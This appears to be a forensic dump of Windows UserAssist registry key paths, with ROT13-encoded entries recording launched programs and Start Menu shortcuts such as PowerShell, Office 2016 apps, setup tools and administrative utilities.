                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qbjaybnqf\aqc48-k86-k64-nyybf-rah.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\jfpevcg.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\fyhv.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.PbagebyCnary

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\jhnhpyg.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\abgrcnq.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Jvaqbjf Rkcybere.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.Furyy.EhaQvnybt

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.SVEFGEHA.RKR.15

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{N3R10OON-P2N1-R0S3-7P97-5Q5521119O40}

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\jhncc.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\efgehv.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pbageby.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.Uryccnar

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf Qrsraqre\ZFNFPhv.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Zntavsl.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pyrnazte.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\freivprf.zfp

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pzq.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{Q4N262QQ-PR44-Q105-S36O-9Q77N8PO65N4}

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\ZFRqtr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\308046O0NS4N39PO

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfpbasvt.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Zvpebfbsg Bssvpr 15\PyvragK64\bssvprpyvpxgbeha.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\Bssvpr\Frghc32.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\PyvpxGbEha\BssvprPyvpxGbEha.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Aneengbe.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\PyvpxGbEha\BssvprP2EPyvrag.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qbjaybnqf\FrghcCebq_BssFpeho.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zzp.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P1P6S8NP-40N3-0S5P-146S-65N9QP70OOO4}

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Ba-Fperra Xrlobneq.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Flfgrz Gbbyf\Cevingr Punenpgre Rqvgbe.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprff 2016.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jrypbzr Pragre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Rkpry 2016.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Pnyphyngbe.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fgvpxl Abgrf.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Favccvat Gbby.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Cnvag.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Sversbk.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\KCF Ivrjre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Snk naq Fpna.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Erzbgr Qrfxgbc Pbaarpgvba.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Tbbtyr Puebzr.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Vagrearg Rkcybere.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Tbbtyr Puebzr.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\CbjreFuryy\CbjreFuryy 7-cerivrj (k64).yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2013\Jbeq 2013.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zrqvn Pragre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Purpx Sbe Hcqngrf.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\P:\CebtenzQngn\Zvpebfbsg\Jvaqbjf\Fgneg Zrah\Jvaqbjf Hcqngr.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Erfgber.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Rqtr.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Qvfx Pyrnahc.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2013\Rkpry 2013.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\BarAbgr 2016.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Sversbk.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jbeq 2016.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Gnfx Fpurqhyre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jbeq 2016.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Bhgybbx 2016.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\CbjreCbvag 2016.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Choyvfure 2016.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fvqrone.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fxlcr sbe Ohfvarff 2016.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Nalgvzr Hctenqr.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf QIQ Znxre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Zrqvn Cynlre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\7-Mvc\7-Mvc Svyr Znantre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\qvfcynlfjvgpu.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zngu Vachg Cnary.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zbovyvgl Pragre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\ArgjbexCebwrpgvba.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fbhaq Erpbeqre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flap Pragre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jbeqcnq.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Npprffvovyvgl\Fcrrpu Erpbtavgvba.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Punenpgre Znc.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\qsethv.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Erfbhepr Zbavgbe.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Vasbezngvba.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre Ercbegf.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\FuncrPbyyrpgbe.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\GnoGvc.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy (k86).yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR (k86).yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzcbarag Freivprf.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzchgre Znantrzrag.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Qngn Fbheprf (BQOP).yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Rirag Ivrjre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\vFPFV Vavgvngbe.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Zrzbel Qvntabfgvpf Gbby.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cresbeznapr Zbavgbe.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cevag Znantrzrag.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Frphevgl Pbasvthengvba Znantrzrag.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\freivprf.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Flfgrz Pbasvthengvba.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Gnfx Fpurqhyre.yax

                
